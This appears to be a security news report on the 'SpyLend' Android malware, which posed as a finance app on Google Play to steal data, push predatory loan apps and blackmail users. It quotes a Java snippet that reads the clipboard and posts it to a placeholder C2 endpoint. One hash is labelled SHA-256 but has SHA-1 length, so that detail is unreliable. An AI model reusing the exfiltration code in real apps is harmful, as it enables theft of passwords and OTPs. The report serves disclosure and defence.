A sophisticated Android malware campaign, identified as “SpyLend,” has successfully infiltrated the Google Play Store, cleverly disguising itself as a financial utility app aimed at Indian users. Operating under the name “Finance Simplified” (package: com.someca.count), the application has garnered over 100,000 downloads since its launch in February 2025, using its legitimate appearance to evade user suspicion.
Cybersecurity firm CYFIRMA has brought this operation to light, revealing a complex attack strategy designed to extract sensitive information, offer predatory loan services, and extort victims through blackmail tactics. Initially, the app presents itself as a benign finance calculator but adapts its interface based on the user’s geolocation.
For users in India, the app activates a WebView component that loads content from adv[.]rp5[.]org, a domain associated with unauthorized loan applications. These services, including KreditApple and MoneyApe, operate beyond the scrutiny of the Play Store, redirecting victims to external Amazon EC2 servers to download malicious APKs, such as KreditApple.apk (SHA-256 fa27aa603eb6807dbc60d5dadc5b8f9b9290099f).
Once installed, SpyLend requests invasive permissions, including access to call logs, SMS, contacts, and clipboard data, all under the pretense of identity verification. Users have reported harassment and blackmail, with threats involving manipulated photos and demands for payment. Negative reviews on the Play Store reflect concerns over data misuse, yet the app remains available as of February 24, 2025.
Technical Exploitation and Command Infrastructure
The operational framework of the malware hinges on its exploitation of Android’s WebView API coupled with a custom command-and-control (C2) server. By dynamically injecting JavaScript code, SpyLend retrieves loan application listings through specific endpoints such as app/product/app/list and app/loan/config.
These APIs provide loan parameters, including interest rates and repayment methods, while tracking user interactions via app/user/saveVisitor, which exfiltrates device metadata and behavioral analytics.
A notable evasion tactic involves hosting loan applications on Amazon EC2 instances, effectively circumventing Play Store vetting processes. The APKs utilize persistence mechanisms such as JobInfoSchedularService and AlarmManagerSchedularBroadcastReceiver, enabling background tasks that maintain access.
Additionally, the malware captures clipboard data every three seconds through ClipboardManager, allowing it to seize passwords, credit card information, and one-time passwords (OTPs):
// Clipboard monitoring code snippet
ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
ClipData clip = clipboard.getPrimaryClip();
String clipboardData = clip.getItemAt(0).getText().toString();
// Exfiltrates data to C2 via JSON
JSONObject exfilData = new JSONObject();
exfilData.put("clipboard", clipboardData);
HttpClient.post(C2_ENDPOINT, exfilData); The C2 infrastructure, located at 16[.]163[.]9[.]142, employs endpoints such as /admin/file/upload to receive stolen SMS messages, call logs, and app lists. Analysis of the admin panels by CYFIRMA reveals the presence of Chinese-language scripts (zh.js), hinting at the origins of the threat actors involved.
Data exfiltration encompasses:
- GPS coordinates, updated every three seconds via
LocationManager. - Installed applications and their installation timestamps (using
PackageManager). - SMS content accessed through the
content://sms/URI.
Despite the protective measures offered by Google’s Play Protect, SpyLend’s reliance on WebView-delivered content enables real-time updates to its payload, effectively evading static analysis. CYFIRMA’s YARA rules, which detect specific hashes like 95a44305f9162352eddbb31e3ea03d7e, along with MITRE ATT&CK mappings, underscore the malware’s capabilities in defense evasion (T1628) and credential access (T1414).
Users are advised to carefully review app permissions, steer clear of third-party APKs, and remain vigilant for any suspicious activity. For enterprises, deploying endpoint detection tools and blacklisting indicators of compromise (IOCs) such as moneyape[.]org is recommended.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here
